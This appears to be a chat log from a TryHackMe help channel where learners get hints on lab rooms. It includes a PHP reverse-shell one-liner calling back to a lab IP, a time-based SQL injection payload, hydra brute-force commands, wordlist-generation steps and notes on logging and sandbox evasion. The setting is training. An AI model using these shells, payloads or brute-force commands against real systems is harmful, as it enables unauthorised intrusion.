What's up with the
What is the name of the project that offers a transform based on ATT&CK?
question?

I thought I had it, but apparently I was wrong

Which room are you in?

Ffs

The correct answer is not the name of the project, but the company who makes it

Welp, at least I got it

lol

I don't get it why my answer is wrong tbh

also struggled with this one^^ wasn't that clear whats exactly wanted

Regarding to the task, what is the -t option doing ?

-t @,%^ Specifies a pattern, eg: @@god@@@@ where the only the @'s, ,'s, %'s, and ^'s will change. @ will insert lower case characters , will insert upper case characters % will insert numbers ^ will insert symbols

Wasn't asking about the man page, was asking about what the task mentioned 🙂 ?

If you're admin, have a look around some of the documents where you think admin will keep stuff?

Found the answer but had to brute-force. The question isn't clear to me:

What is the crunch command to generate a list containing THM@! and output to a file named tryhackme.txt?

THM should be static and @! should be found by placeholders for the answer

Right, that's why I was asking about what was mentioned about the -t option.
Since you haven't supplied a word that's going to be combined with the specific character set that you are providing.
Thus your wordlist would get way longer if you supply ,,, and makes the -t flag unnecessary

Guys, could you help me with this question (What type of logging will this method prevent?) this is Evading Logging and Monitoring room, task 9. I completed already all room but stack on it
https://tryhackme.com/room/monitoringevasion

Check the text above the questions

yes i solved task 9

i am stuck on task 10

https://tryhackme.com/room/monitoringevasion

can anyone help me on task 10

Ah Lassi already got you I see 😉

Hi guys! I’m in the room evading logging and monitoring task 10
Any of you knows how can I copy and paste the code to the windows sandbox?
I have only 3 task left to finish the Read Teaming Sandbox evasion task 5 , signature Evasion task 7( that code kill my eyes yesterday) 🤣

guys please help i cant find anything on the "walking an application" what ever the acme it support webiste im going to has nothing in thr source

Might want to verify and show a screenshot

!docs verify

Hello, Can I DM you, I stuck here too

Anyone can help me in Zeek-Exercise room task 3.

what is your question?

task 3.3 I tried three hash but i can't get the ans. can i dm you for a hash check?

no dm please

I cant enter this room at the moment. Please wait for someone who can who wants to assist you

3.3 is which question in thatsscreenshot?

the first

did you follow the questions instruction ( go to virustotal? )

I did, I tried.

what does the hint reveal

I'm not in the room so I can only give some basic blind suggestions 😉

thanks

did you get it or?

not yet

Hi, first time here, and I try to do the room Vulnversity, the Task is want me to find version of squid proxy version and the port server is running on. My problem is after nmap there is no port running for squid and port 3333(which is the port server should running on) and I try to open with the IP on browser, there is error response 405 method not allowed. I try to ask is this room dead?

can u show your nmap result?

!docs verify

verify to send screenshot

Nmap scan report for ec2-34-249-229-192.eu-west-1.compute.amazonaws.com (34.249.229.192)
Host is up (0.20s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
25/tcp filtered smtp
80/tcp open http WebSockify Python/3.6.9
111/tcp open rpcbind 2-4 (RPC #100000)
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
445/tcp filtered microsoft-ds
3389/tcp open ms-wbt-server xrdp
5901/tcp open vnc VNC (protocol 3.8)
6001/tcp open X11 (access denied)
7777/tcp open cbt?
7778/tcp open interwise?

screenshot here

why do u scan 34.249.229.192?

I use my own laptop scan the public ip of that attack box

the result is same when I use the split view on website

I want to give more try but the split view is tooooo slow and I switch

ohh u need to connect to vpn first to do any of the rooms in THM

!vpn

do this room first

ok let me take look first, any way thank you for help😆

In the Into to Scripting room is asks what the data type for the payload should be? I can't find the right answer anywhere... what is it asking for?

Which room?

Intro to PoC Scripting

@lucid junco ^

Oh I haven't done that one.

I have tried all the 'data types' that I thought would make sense but none of them are the answer

I suspect this will be either kind of dumb or a "DOH!" moment yup... DOH!

How to solve windows local persistent room

I followed the instructions but I can't get the third flag. When I rdp it says access denied

Rid hijacking

Morning All

Anyone do the 'brute force heroes' room lately? I'm stuck on task 5 (bruteforce password with patator) .. I have patator doing the bruteforce & tried a couple of different password lists (including the passwords.txt provided with the room) but haven't had success as of yet

Figured it out.

Can anyone give me a hint for the SQL injection module? Basically I'm at the SLEEP injection step, and here's what I'm trying to do: ||referrer=useeer' UNION SELECT SLEEP(5),2 FROM users WHERE id = '1' AND password = '%';-- - || The request doesn't wait for 5 seconds before being performed so I assume something must be wrong, but what? How is it possible to guess the password if I can't use the || % || character?

what room is this one?

https://tryhackme.com/room/sqlinjectionlm

ty

No problem

just waiting for the attackbox to boot

I'm pretty sure I can see what's wrong with it but I wanna double check

This is much appreciated

Well, that's what this channel is for 🙂

@white salmon Sorry I went afk for a second, the statement is almost correct, check your column names. 🙂

I had to go make a coffee haha

It's alright, I hope you have a nice meal, so that's just about the column names?

id seems to be fine since the request waits for 5 seconds, so it must be the password one I'm wrong about

So I checked my column names and both seem to be right, which is why it's odd, but when I do the following it does wait for five seconds: || AND password != "%" ||

So I guess the issue is || % || is being counted as a character of the password

Have a look back at the boolean based sqli.

Oh yeah I understand

Sorry for bothering

it's no bother at all

again, we're here to help.

well, it's hints after all, not answers 😉

Yeah I figured out I had to use || LIKE || instead of || = ||

mmhm

+rep @dusk imp

Gave +1 Rep to @dusk imp

+rep @dusk imp (Didn't know we could do this)

Gave +1 Rep to @dusk imp

two reps

@lucid junco how nice. ❤️

thanks both of you.

You're welcome, you were very helpful

I just got the flag, thank you unreal

Is it right : crunch 5 5 -t "THM@!" -o tryhackme.txt
If it is why it shows error?

Im in the "Blaster" room, Task 3. I'm stuck trying to find the correct cve. I've watched the walk through video. No history in the target machine web browser. Tried searchspoit and google (iis 10). could not find the cve they are looking for. any body got a suggestion what to search for next.

hey im in linux fund. stuck in http-server missino. can anyone help?

what's the problem you are encountering?

first of all thanks for answer quickly

so im trying to use http server to copy some file. and when i write from another terminal : wget XXX..., its says the file not found

so i try to find it by find command, and it says i have no permision

What's the exact command you did? Where is the file located?

Sorry, I don't have long also. I have to leave in a few minutes

im not sure where is it

Do you have a link to the room you are working on?

yes

https://tryhackme.com/room/linuxfundamentalspart3#

task num 4

For this room, there's walkthrough video. Have you checked it out?

If ever, have you started the target machine?

Are you using your VPN or the attack box?

i did already, i think when they took the video the mission was a little bit diffrent

i use attack box

and i cant find the .flag.txt file for coping

what's the command you did? Can you provide a screenshot?

yes, can i DM you please?

Sorry, no. I have to go also.

If ever, you need to verify so you can post screenshots

!docs verify

follow the steps there

ok thanks

!rep

!rep

!rank

!rank

+rep @vagrant vapor

any hint ?

sandbox evasion last question

task 4

give task #3 section a read again

@rose jewel let's talk in here.

ok so i have 1 tunnel inteface tun0

and i have checked room write ups my way is correct but the web server have issues with opening certain directorys

sudo ip link set dev tun0 mtu 1200

Try that in a seperate terminal.

it worked

thanks

👍

+rep @lucid junco

Gave +1 Rep to @lucid junco

for the question "Deploy the interactive lab using the "View Site" button and spoof your MAC address to access the site. What is the flag?", when i do this i dont see a flag 😅 any hints?

Can you share room link please?

https://tryhackme.com/room/whatisnetworking

its the second task thing

last question 😅

Copy the MAC Addr. of alice and paste that into Bob's MAC addr. and request site

Ooooh

i didnt realize i could edit the address 😂 mb

thanks for the help!

hi

Need help out

red team room task 6

What syntax would you use to create a rule to produce the following: "S[Word]NN where N is Number and S is a symbol of !@?

link to said room???

https://tryhackme.com/room/passwordattacks

yeah think so too scrubs but they seem confussed

Hello hackers, I'm in the room Intro to LAN right now and on the section for ARP Protocol > questions, one of them asks; What category of ARP Packet asks a device whether or not it has a specific IP address?

From what I can tell, the answer is "ARP request." No?

It says incorrect answer.

Ah, thanks!

Anyone have any words of advice on what I'm doing wrong when trying to copy a SSH Private key? I keep getting "error in libcrypto" when trying to login with it. I've made sure there are no extra spaces or characters before or after the begin or end

nevermind, just found my issue haha

I have finally been able to login with a username starting with 'a' in the Looking Glass room but cant find anything that points me where to go from here. Any hints available that someone can share?

what task are u trying to get next?

block logs are located in Microsoft/Windows/PowerShell/Operational or Microsoft-Windows-PowerShell

why i cant locate the blocks?

Which evasion technique involves burning compute-time to escape the sandbox?

https://tryhackme.com/room/sandboxevasion

take a look at task #3, one of the techniques discusses using compute-time as a sandbox evasion method

Im trying to get the root flag

Going thru nearly every link in hacktricks I was finally able to figure it out. Man that was difficult.

because it's not a normal sudo -l like it usually be, i only know how to change host with sudo from write up as well

Ive used the host parameter with sudo before but I didnt think at all to look in to sudoers... I dont think I evert would have thought about that if I didnt see it mentioned on hacktricks

yea when i was doing it, i tried to do sudo -l but it needs pw lol

That was one of the first things I tried too

And then linpeas of course which showed me nothing. I then spent hours just trying to look around the system. Epic fail there too.

when im too stuck, write up can help

just to know what to do next

Definitely. Im new to thm so Im trying to do these without writeups

i'm trying to learn so reading write up isn't too bad

Not at all

apparently write up can actually point out new technique to solve

always a good idea to read it after if u insist to not use it while doing the box

Thats a great point. I should go thru some writeups and see what other people did

yea maybe we haven't went through the rabbit hole and the way of getting out of it

Im working on the Mr Robot ctf right now. Need 3rd flag

linpeas for the win on that one

u can just do manual enum for it

find / -perm /4000 2>/dev/null and look at the unusual one

Good idea. Linpeas is a goto for me so I automatically used it. I like your way for when Im unable to upload anything

Thank you @languid isle

Gave +1 Rep to @languid isle

Im working on the tomghost machine but getting a secret key not available error when decrypting the pgp file. Is this expected?

Ive also tried specifying the .asc file and get the same error

Ah... documentation says I need to import the key file first. nvm

hey guys i’m having trouble with the room password attacks in task 8 can i have some help?

last 3 flags of task 8 of room passwords attacks

yes sorry. @burnt rivet

so for task8 second question i used this command: hydra -l pittman@clinic.thmredteam.com -P wordlist.lst smtp://10.10.58.130:25 -v

where wordlist.lst is a dictionary based file made with john with this rule: Az" [0-9][0-9]" ^[!@]

using this command: john --wordlist=clinic.lst --rules=thm-passoword-attacks --stdout>wordlist.lst

where clinic.lst is a file that i got with this command: cewl https://clinic.thmredteam.com -m 8 -d 5 -w clinic.lst

but when i run hydra i keep getting this error [ERROR] SMTP LOGIN AUTH, either this auth is disabled or server is not using auth: 454 4.7.0 Temporary authentication failure: Connection lost to authentication server

Obfuscation Principles
Task 5

What obfuscation layer aims to confuse an analyst by manipulating the code flow and abstract syntax trees?

Can i get a tip as really struggling with this, have tried everything i think it can be and have tried everything.

@coral girder its written in plain english on the page.

keep trying things. keep in mind it is asking for the name of a whole layer.

Honestly think ive tried everything on page lol

@coral girder I promise you haven't because the answer is literally on the page. A layer encompasses more than one principle in this case. Find something that encompasses smaller principles.

Thank you, its always easy when you know haha thanks fo rthe help.

I am working on the nax room and am stuck trying to get some data from a website in the image I found for question 1. The site BertNase site says my image does not have any data. Can someone help push me in the correct direction on why that might be? Ive downloaded it multiple times...

Got it... nvm

Does anyone know what happens with of the webshell of persisting through existing services? In Windows local persistence

Hello I need help to answer this questions task 4 Active directory basics

Actually I just donot know how to log in to another user account

I even do not know how to connect via RDP

what is that 😦

remote desktop applications that you would use to connect to the box

Ok but I have no idea how to do it , is there any link or reference to show me how

for xfreerdp -> https://miloserdov.org/?p=4516

Ok I will try … thank you 🙏

Gave +1 Rep to @spare ibex

In windowsapi room...and the question is what type of method is used to reference the API call to obtain a struck?

hi guys can anyone help me out with hydra

i want to brute force a login form

hydra -t 1 -V -f -l milesdyson -P passwords 10.10.38.225/squirrelmail/src/login.php http-form-post 

but its not working folllowing error

[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[ERROR] the variables argument needs at least the strings ^USER^ or ^PASS^: (null)

wait where

did it with burp suite

oh damn thought

hydra just takes the username and the specified passwordlist and enters it in the form

Hi guys

sitting on the room skynet and i try to use the php reverse shell

<?php
    system('php -r '$sock=fsockopen("10.10.95.57",4444);exec("/bin/sh -i <&5 >&5 2>&5");'')
?>

is this valid?

would think you would need a bigger file then that for a php reverse shell but could be wrong

yuup shadow is wrong according to the options from 0day:s revshells.com

That's a really weird way to use the php reverse shell payload given you already have PHP code execution between <?php ?> tags

hi guys! is still working CTF "hacker vs hacker"?? i found the lachlan ssh key and can't get into it, with the key 'nthisis........'

Hi guys, I am new in CyberSec, I am trying doing telnet exploiting in network service room on THM. I am just wondering why trying connect with netcat like ".RUN nc [my machine ip] [port] and my machine is listening on that port, my machine comes up with connected with the target machine msg , but when Im tryin some command there is no output. But I try to .RUN a payload generated by msfvenom reverse_netcat, it works fine. Thank you in advance

Hello im doing the room vulnversity, and im trying to get a root shell by abusing /bin/systemctl SUID permisions but the hint i need is netcat is giving me this

listening on [any] 8080 ...
10.10.65.223: inverse host lookup failed: Unknown host
connect to [10.13.48.58] from (UNKNOWN) [10.10.65.223] 51070
/bin/sh: 0: can't access tty; job control turned off

Boxes ip mine is 10.13.48.58

For reverse shells, I recommend using https://www.revshells.com/

And for PHP reverse shells, I always use PentestMonkey's PHP reverse shell: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

Just change the IP on line 49 and the port on line 50 and you're good to go

you mean when my two machines connected by nc successfully, it is not a shell and can not exe cmds and when i use msfvenom to create a reverse_netcat it will give me a shell to execute command. Am I understand right?

thanks sir

Gave +1 Rep to @burnt rivet

for the mr robot ctf, is there any way of making the process of bruteforcing the password faster cuz its will take like half an hour for hydra to run through the whole list

I think if you add -f it should stop when it's found the correct password.

With the exception of Juice shop, most, if not all, passwords should be brute-forced in 5 min(s)

i added the "your password is incorrect" thing in the command for it to know when to stop

||hydra -V -l Elliot -P fsocity.dic 10.10.157.77 http-post-form "/wp-admin.php:log=^USER^&pwd=^PASS^&wp-submit=Log+ In: password you entered"||

thats the full command

Use wpscan

Hope it helps...

Whats wrong with this: crunch 5 5 -t THM@! -o tryhackme.txt, room: https://tryhackme.com/room/passwordattacks task 4 last question

So like they are not always the same? Or

I am looking at the man page I believe I am getting it, just not sure what the other character is

Where does it say '!' is a special character ? Or?

Damn, I am clearly missing something here. So ! is a special character however, its not in the list of special patterns 🤔

Yes I don't see "!"

Okay, Yes thats why I though this would be Right, crunch 5 5 -t THM@! -o tryhackme.txt.

ah another person having problem with that part of password attacks

good old classic at this point

crunch 5 5 -t THM%% -o tryhackme.txt

crunch 5 5 -t THM^^ -o tryhackme.txt ?

Lol, thanks

YAY you got the answer

I see the problem is with understanding the question. Since I instantly thought 'THM@!' was the pattern it wanted me to use

yeah the english for the question might need some simplification.... but dunno about how to get that done

Perhaps just emphasise it, like saying create a crunch command that will contain THM@! and THM!!

good evening, needing a little nudge for crypto 101

Please be more specific. People can't offer help until they know what you need a nudge on